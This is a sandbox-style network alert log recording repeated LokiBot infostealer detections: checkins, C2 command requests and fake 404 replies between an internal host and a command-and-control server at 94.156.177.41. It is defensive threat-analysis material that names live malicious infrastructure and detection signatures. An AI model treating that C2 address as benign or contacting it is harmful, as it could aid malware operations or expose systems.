                            2024-12-09T08:52:23.972500+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64981894.156.177.4180TCP
                            2024-12-09T08:52:25.264366+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64981894.156.177.4180TCP
                            2024-12-09T08:52:25.264366+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64981894.156.177.4180TCP
                            2024-12-09T08:52:25.383816+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649818TCP
                            2024-12-09T08:52:25.653268+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64982394.156.177.4180TCP
                            2024-12-09T08:52:25.653268+01002025381ET MALWARE LokiBot Checkin1192.168.2.64982394.156.177.4180TCP
                            2024-12-09T08:52:25.653268+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64982394.156.177.4180TCP
                            2024-12-09T08:52:27.091553+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64982394.156.177.4180TCP
                            2024-12-09T08:52:27.091553+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64982394.156.177.4180TCP
                            2024-12-09T08:52:27.211831+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649823TCP
                            2024-12-09T08:52:27.621178+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64982894.156.177.4180TCP
                            2024-12-09T08:52:27.621178+01002025381ET MALWARE LokiBot Checkin1192.168.2.64982894.156.177.4180TCP
                            2024-12-09T08:52:27.621178+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64982894.156.177.4180TCP
                            2024-12-09T08:52:28.905374+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64982894.156.177.4180TCP
                            2024-12-09T08:52:28.905374+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64982894.156.177.4180TCP
                            2024-12-09T08:52:29.025072+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649828TCP
                            2024-12-09T08:52:29.310465+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64983394.156.177.4180TCP
                            2024-12-09T08:52:29.310465+01002025381ET MALWARE LokiBot Checkin1192.168.2.64983394.156.177.4180TCP
                            2024-12-09T08:52:29.310465+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64983394.156.177.4180TCP
                            2024-12-09T08:52:30.743567+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64983394.156.177.4180TCP
                            2024-12-09T08:52:30.743567+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64983394.156.177.4180TCP
                            2024-12-09T08:52:30.869216+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649833TCP
                            2024-12-09T08:52:31.142639+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64983694.156.177.4180TCP
                            2024-12-09T08:52:31.142639+01002025381ET MALWARE LokiBot Checkin1192.168.2.64983694.156.177.4180TCP
                            2024-12-09T08:52:31.142639+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64983694.156.177.4180TCP
                            2024-12-09T08:52:32.430394+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64983694.156.177.4180TCP
                            2024-12-09T08:52:32.430394+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64983694.156.177.4180TCP
                            2024-12-09T08:52:32.583829+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649836TCP
                            2024-12-09T08:52:32.844275+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64984194.156.177.4180TCP
                            2024-12-09T08:52:32.844275+01002025381ET MALWARE LokiBot Checkin1192.168.2.64984194.156.177.4180TCP
                            2024-12-09T08:52:32.844275+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64984194.156.177.4180TCP
                            2024-12-09T08:52:34.283694+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64984194.156.177.4180TCP
                            2024-12-09T08:52:34.283694+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64984194.156.177.4180TCP
                            2024-12-09T08:52:34.403160+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649841TCP
                            2024-12-09T08:52:34.672995+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64984894.156.177.4180TCP
                            2024-12-09T08:52:34.672995+01002025381ET MALWARE LokiBot Checkin1192.168.2.64984894.156.177.4180TCP
                            2024-12-09T08:52:34.672995+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64984894.156.177.4180TCP
                            2024-12-09T08:52:36.102690+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64984894.156.177.4180TCP
                            2024-12-09T08:52:36.102690+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64984894.156.177.4180TCP
                            2024-12-09T08:52:36.222043+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649848TCP
                            2024-12-09T08:52:36.479932+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64985494.156.177.4180TCP
                            2024-12-09T08:52:36.479932+01002025381ET MALWARE LokiBot Checkin1192.168.2.64985494.156.177.4180TCP
                            2024-12-09T08:52:36.479932+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64985494.156.177.4180TCP
                            2024-12-09T08:52:37.818426+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64985494.156.177.4180TCP
                            2024-12-09T08:52:37.818426+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64985494.156.177.4180TCP
                            2024-12-09T08:52:37.937696+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649854TCP
                            2024-12-09T08:52:38.214537+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64985994.156.177.4180TCP
                            2024-12-09T08:52:38.214537+01002025381ET MALWARE LokiBot Checkin1192.168.2.64985994.156.177.4180TCP
                            2024-12-09T08:52:38.214537+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64985994.156.177.4180TCP
                            2024-12-09T08:52:39.497811+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64985994.156.177.4180TCP
                            2024-12-09T08:52:39.497811+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64985994.156.177.4180TCP
                            2024-12-09T08:52:39.617090+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649859TCP
                            2024-12-09T08:52:39.872509+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64986394.156.177.4180TCP
                            2024-12-09T08:52:39.872509+01002025381ET MALWARE LokiBot Checkin1192.168.2.64986394.156.177.4180TCP
                            2024-12-09T08:52:39.872509+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64986394.156.177.4180TCP
                            2024-12-09T08:52:41.152631+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64986394.156.177.4180TCP
                            2024-12-09T08:52:41.152631+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64986394.156.177.4180TCP
                            2024-12-09T08:52:41.271992+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649863TCP
                            2024-12-09T08:52:41.529353+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64986794.156.177.4180TCP
                            2024-12-09T08:52:41.529353+01002025381ET MALWARE LokiBot Checkin1192.168.2.64986794.156.177.4180TCP
                            2024-12-09T08:52:41.529353+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64986794.156.177.4180TCP
                            2024-12-09T08:52:42.964742+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64986794.156.177.4180TCP
                            2024-12-09T08:52:42.964742+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64986794.156.177.4180TCP
                            2024-12-09T08:52:43.084245+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649867TCP
                            2024-12-09T08:52:43.346921+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64987394.156.177.4180TCP
                            2024-12-09T08:52:43.346921+01002025381ET MALWARE LokiBot Checkin1192.168.2.64987394.156.177.4180TCP
                            2024-12-09T08:52:43.346921+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64987394.156.177.4180TCP
                            2024-12-09T08:52:44.776414+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64987394.156.177.4180TCP
                            2024-12-09T08:52:44.776414+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64987394.156.177.4180TCP
                            2024-12-09T08:52:44.895864+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649873TCP
                            2024-12-09T08:52:45.154565+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64987994.156.177.4180TCP
                            2024-12-09T08:52:45.154565+01002025381ET MALWARE LokiBot Checkin1192.168.2.64987994.156.177.4180TCP
                            2024-12-09T08:52:45.154565+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64987994.156.177.4180TCP
                            2024-12-09T08:52:46.592675+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64987994.156.177.4180TCP
                            2024-12-09T08:52:46.592675+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64987994.156.177.4180TCP
                            2024-12-09T08:52:46.712064+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649879TCP
                            2024-12-09T08:52:46.983185+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64988594.156.177.4180TCP
                            2024-12-09T08:52:46.983185+01002025381ET MALWARE LokiBot Checkin1192.168.2.64988594.156.177.4180TCP
                            2024-12-09T08:52:46.983185+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64988594.156.177.4180TCP
                            2024-12-09T08:52:48.268574+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64988594.156.177.4180TCP
                            2024-12-09T08:52:48.268574+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64988594.156.177.4180TCP
                            2024-12-09T08:52:48.387942+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649885TCP
                            2024-12-09T08:52:48.658727+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64988894.156.177.4180TCP
                            2024-12-09T08:52:48.658727+01002025381ET MALWARE LokiBot Checkin1192.168.2.64988894.156.177.4180TCP
                            2024-12-09T08:52:48.658727+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64988894.156.177.4180TCP
                            2024-12-09T08:52:50.978504+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64988894.156.177.4180TCP
                            2024-12-09T08:52:50.978504+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64988894.156.177.4180TCP
                            2024-12-09T08:52:51.098178+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649888TCP
                            2024-12-09T08:52:51.358825+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64989694.156.177.4180TCP
                            2024-12-09T08:52:51.358825+01002025381ET MALWARE LokiBot Checkin1192.168.2.64989694.156.177.4180TCP
                            2024-12-09T08:52:51.358825+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64989694.156.177.4180TCP
                            2024-12-09T08:52:52.651034+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64989694.156.177.4180TCP
                            2024-12-09T08:52:52.651034+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64989694.156.177.4180TCP
                            2024-12-09T08:52:52.770279+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649896TCP
                            2024-12-09T08:52:53.027579+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64990094.156.177.4180TCP
                            2024-12-09T08:52:53.027579+01002025381ET MALWARE LokiBot Checkin1192.168.2.64990094.156.177.4180TCP
                            2024-12-09T08:52:53.027579+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64990094.156.177.4180TCP
                            2024-12-09T08:52:54.731708+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64990094.156.177.4180TCP
                            2024-12-09T08:52:54.731708+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64990094.156.177.4180TCP
                            2024-12-09T08:52:54.851047+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649900TCP
                            2024-12-09T08:52:55.108776+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64990694.156.177.4180TCP
                            2024-12-09T08:52:55.108776+01002025381ET MALWARE LokiBot Checkin1192.168.2.64990694.156.177.4180TCP
                            2024-12-09T08:52:55.108776+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64990694.156.177.4180TCP
                            2024-12-09T08:52:56.395944+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64990694.156.177.4180TCP
                            2024-12-09T08:52:56.395944+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64990694.156.177.4180TCP
                            2024-12-09T08:52:56.515239+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649906TCP
                            2024-12-09T08:52:56.790419+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64991194.156.177.4180TCP
                            2024-12-09T08:52:56.790419+01002025381ET MALWARE LokiBot Checkin1192.168.2.64991194.156.177.4180TCP
                            2024-12-09T08:52:56.790419+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64991194.156.177.4180TCP
                            2024-12-09T08:52:58.223873+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64991194.156.177.4180TCP
                            2024-12-09T08:52:58.223873+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64991194.156.177.4180TCP
                            2024-12-09T08:52:58.343275+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649911TCP
                            2024-12-09T08:52:58.611498+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64991794.156.177.4180TCP
                            2024-12-09T08:52:58.611498+01002025381ET MALWARE LokiBot Checkin1192.168.2.64991794.156.177.4180TCP
                            2024-12-09T08:52:58.611498+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64991794.156.177.4180TCP
                            2024-12-09T08:53:00.043307+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64991794.156.177.4180TCP
                            2024-12-09T08:53:00.043307+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64991794.156.177.4180TCP
                            2024-12-09T08:53:00.162703+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649917TCP
                            2024-12-09T08:53:00.419701+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64992494.156.177.4180TCP
                            2024-12-09T08:53:00.419701+01002025381ET MALWARE LokiBot Checkin1192.168.2.64992494.156.177.4180TCP
                            2024-12-09T08:53:00.419701+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64992494.156.177.4180TCP
                            2024-12-09T08:53:01.856477+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64992494.156.177.4180TCP
                            2024-12-09T08:53:01.856477+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64992494.156.177.4180TCP
                            2024-12-09T08:53:01.975965+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649924TCP
                            2024-12-09T08:53:02.244480+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64992994.156.177.4180TCP
                            2024-12-09T08:53:02.244480+01002025381ET MALWARE LokiBot Checkin1192.168.2.64992994.156.177.4180TCP
                            2024-12-09T08:53:02.244480+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64992994.156.177.4180TCP
                            2024-12-09T08:53:03.676877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64992994.156.177.4180TCP
                            2024-12-09T08:53:03.676877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64992994.156.177.4180TCP
                            2024-12-09T08:53:03.799477+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649929TCP
                            2024-12-09T08:53:04.064839+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64993594.156.177.4180TCP
                            2024-12-09T08:53:04.064839+01002025381ET MALWARE LokiBot Checkin1192.168.2.64993594.156.177.4180TCP
                            2024-12-09T08:53:04.064839+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64993594.156.177.4180TCP
                            2024-12-09T08:53:05.342475+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64993594.156.177.4180TCP
                            2024-12-09T08:53:05.342475+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64993594.156.177.4180TCP
                            2024-12-09T08:53:05.461784+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649935TCP
                            2024-12-09T08:53:05.731669+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64993794.156.177.4180TCP
                            2024-12-09T08:53:05.731669+01002025381ET MALWARE LokiBot Checkin1192.168.2.64993794.156.177.4180TCP
                            2024-12-09T08:53:05.731669+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64993794.156.177.4180TCP
                            2024-12-09T08:53:07.013704+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64993794.156.177.4180TCP
                            2024-12-09T08:53:07.013704+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64993794.156.177.4180TCP
                            2024-12-09T08:53:07.133139+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649937TCP
                            2024-12-09T08:53:07.405384+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64994394.156.177.4180TCP
                            2024-12-09T08:53:07.405384+01002025381ET MALWARE LokiBot Checkin1192.168.2.64994394.156.177.4180TCP
                            2024-12-09T08:53:07.405384+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64994394.156.177.4180TCP
                            2024-12-09T08:53:08.848305+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64994394.156.177.4180TCP
                            2024-12-09T08:53:08.848305+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64994394.156.177.4180TCP
                            2024-12-09T08:53:08.967742+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649943TCP
                            2024-12-09T08:53:09.232229+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64994994.156.177.4180TCP
                            2024-12-09T08:53:09.232229+01002025381ET MALWARE LokiBot Checkin1192.168.2.64994994.156.177.4180TCP
                            2024-12-09T08:53:09.232229+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64994994.156.177.4180TCP
                            2024-12-09T08:53:10.512942+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64994994.156.177.4180TCP
                            2024-12-09T08:53:10.512942+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64994994.156.177.4180TCP
                            2024-12-09T08:53:10.632378+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649949TCP
                            2024-12-09T08:53:10.889178+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64995494.156.177.4180TCP
                            2024-12-09T08:53:10.889178+01002025381ET MALWARE LokiBot Checkin1192.168.2.64995494.156.177.4180TCP
                            2024-12-09T08:53:10.889178+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64995494.156.177.4180TCP
                            2024-12-09T08:53:12.323602+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64995494.156.177.4180TCP
                            2024-12-09T08:53:12.323602+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64995494.156.177.4180TCP
                            2024-12-09T08:53:12.442925+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649954TCP
                            2024-12-09T08:53:12.702697+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64996094.156.177.4180TCP
                            2024-12-09T08:53:12.702697+01002025381ET MALWARE LokiBot Checkin1192.168.2.64996094.156.177.4180TCP
                            2024-12-09T08:53:12.702697+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64996094.156.177.4180TCP
                            2024-12-09T08:53:14.137920+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64996094.156.177.4180TCP
                            2024-12-09T08:53:14.137920+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64996094.156.177.4180TCP
                            2024-12-09T08:53:14.257210+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649960TCP
                            2024-12-09T08:53:14.518189+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64996294.156.177.4180TCP
                            2024-12-09T08:53:14.518189+01002025381ET MALWARE LokiBot Checkin1192.168.2.64996294.156.177.4180TCP
                            2024-12-09T08:53:14.518189+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64996294.156.177.4180TCP
                            2024-12-09T08:53:15.952241+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64996294.156.177.4180TCP
                            2024-12-09T08:53:15.952241+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64996294.156.177.4180TCP
                            2024-12-09T08:53:16.072199+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649962TCP
                            2024-12-09T08:53:16.345760+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64996894.156.177.4180TCP
                            2024-12-09T08:53:16.345760+01002025381ET MALWARE LokiBot Checkin1192.168.2.64996894.156.177.4180TCP
                            2024-12-09T08:53:16.345760+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64996894.156.177.4180TCP
                            2024-12-09T08:53:17.623736+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64996894.156.177.4180TCP
                            2024-12-09T08:53:17.623736+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64996894.156.177.4180TCP
                            2024-12-09T08:53:17.742970+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649968TCP
                            2024-12-09T08:53:18.018612+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64997394.156.177.4180TCP
                            2024-12-09T08:53:18.018612+01002025381ET MALWARE LokiBot Checkin1192.168.2.64997394.156.177.4180TCP
                            2024-12-09T08:53:18.018612+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64997394.156.177.4180TCP
                            2024-12-09T08:53:19.453534+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64997394.156.177.4180TCP
                            2024-12-09T08:53:19.453534+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64997394.156.177.4180TCP
                            2024-12-09T08:53:19.572995+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649973TCP
                            2024-12-09T08:53:19.857048+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64997894.156.177.4180TCP
                            2024-12-09T08:53:19.857048+01002025381ET MALWARE LokiBot Checkin1192.168.2.64997894.156.177.4180TCP
                            2024-12-09T08:53:19.857048+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64997894.156.177.4180TCP
                            2024-12-09T08:53:21.134282+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64997894.156.177.4180TCP
                            2024-12-09T08:53:21.134282+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64997894.156.177.4180TCP
                            2024-12-09T08:53:21.253640+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649978TCP
                            2024-12-09T08:53:21.514620+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64998494.156.177.4180TCP
                            2024-12-09T08:53:21.514620+01002025381ET MALWARE LokiBot Checkin1192.168.2.64998494.156.177.4180TCP
                            2024-12-09T08:53:21.514620+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64998494.156.177.4180TCP
                            2024-12-09T08:53:23.236388+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64998494.156.177.4180TCP
                            2024-12-09T08:53:23.236388+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64998494.156.177.4180TCP
                            2024-12-09T08:53:23.356465+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649984TCP
                            2024-12-09T08:53:23.627769+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64999094.156.177.4180TCP
                            2024-12-09T08:53:23.627769+01002025381ET MALWARE LokiBot Checkin1192.168.2.64999094.156.177.4180TCP
                            2024-12-09T08:53:23.627769+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64999094.156.177.4180TCP
                            2024-12-09T08:53:25.096431+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64999094.156.177.4180TCP
                            2024-12-09T08:53:25.096431+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64999094.156.177.4180TCP
                            2024-12-09T08:53:25.215864+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649990TCP
                            2024-12-09T08:53:25.479289+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64999494.156.177.4180TCP
                            2024-12-09T08:53:25.479289+01002025381ET MALWARE LokiBot Checkin1192.168.2.64999494.156.177.4180TCP
                            2024-12-09T08:53:25.479289+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64999494.156.177.4180TCP
                            2024-12-09T08:53:26.917838+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64999494.156.177.4180TCP
                            2024-12-09T08:53:26.917838+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64999494.156.177.4180TCP
                            2024-12-09T08:53:27.037389+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649994TCP
                            2024-12-09T08:53:27.294180+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.65000094.156.177.4180TCP
                            2024-12-09T08:53:27.294180+01002025381ET MALWARE LokiBot Checkin1192.168.2.65000094.156.177.4180TCP
                            2024-12-09T08:53:27.294180+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.65000094.156.177.4180TCP
                            2024-12-09T08:53:31.731754+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.65000094.156.177.4180TCP
                            2024-12-09T08:53:31.731754+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.65000094.156.177.4180TCP
                            2024-12-09T08:53:31.852429+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.650000TCP
                            2024-12-09T08:53:32.251367+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.65001494.156.177.4180TCP
                            2024-12-09T08:53:32.251367+01002025381ET MALWARE LokiBot Checkin1192.168.2.65001494.156.177.4180TCP
                            2024-12-09T08:53:32.251367+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.65001494.156.177.4180TCP
                            2024-12-09T08:53:34.080464+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.65001494.156.177.4180TCP
                            2024-12-09T08:53:34.080464+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.65001494.156.177.4180TCP
                            2024-12-09T08:53:34.199827+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.650014TCP
                            2024-12-09T08:53:34.465271+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.65002094.156.177.4180TCP
                            2024-12-09T08:53:34.465271+01002025381ET MALWARE LokiBot Checkin1192.168.2.65002094.156.177.4180TCP
                            2024-12-09T08:53:34.465271+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.65002094.156.177.4180TCP
                            2024-12-09T08:53:38.905570+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.65002094.156.177.4180TCP
                            2024-12-09T08:53:38.905570+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.65002094.156.177.4180TCP
                            2024-12-09T08:53:39.024901+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.650020TCP
                            2024-12-09T08:53:39.296364+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.65003294.156.177.4180TCP
                            2024-12-09T08:53:39.296364+01002025381ET MALWARE LokiBot Checkin1192.168.2.65003294.156.177.4180TCP
                            2024-12-09T08:53:39.296364+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.65003294.156.177.4180TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 9, 2024 08:51:39.322993994 CET4970780192.168.2.694.156.177.41
                            Dec 9, 2024 08:51:39.442457914 CET804970794.156.177.41192.168.2.6
